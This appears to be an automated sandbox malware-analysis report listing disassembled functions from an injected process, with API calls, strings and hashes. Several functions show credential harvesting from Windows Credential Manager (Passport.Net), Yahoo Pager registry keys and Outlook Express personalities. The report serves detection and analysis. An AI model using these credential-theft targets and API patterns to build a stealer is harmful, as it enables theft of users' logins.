                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F057 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                      • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                      • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004032A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                                        • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                                        • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                      • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                      • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004101D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                      • API String ID: 2859077140-3316789007
                                                                                                                                                                                                                      • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                      • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443A35 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                        • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                        • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                      • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                      • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040900D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                                                      • API String ID: 408644273-2682877464
                                                                                                                                                                                                                      • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                      • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406B15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                      • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                      • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410909 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,762571C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1506664499
                                                                                                                                                                                                                      • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                      • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0043D438 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID: $no query solution
                                                                                                                                                                                                                      • API String ID: 368790112-326442043
                                                                                                                                                                                                                      • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                      • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0043000F Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                      • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0043CB52 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                      • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                      • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041D3D8 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 231171946-3708268960
                                                                                                                                                                                                                      • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                      • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00424D44 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 173COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                      • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                      • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413F5C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                                                                                      • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                      • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413E34 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                      • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                      • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A8C2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                                                        • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                      • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                      • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040717E Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 125969286-0
                                                                                                                                                                                                                      • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                      • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408E21 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
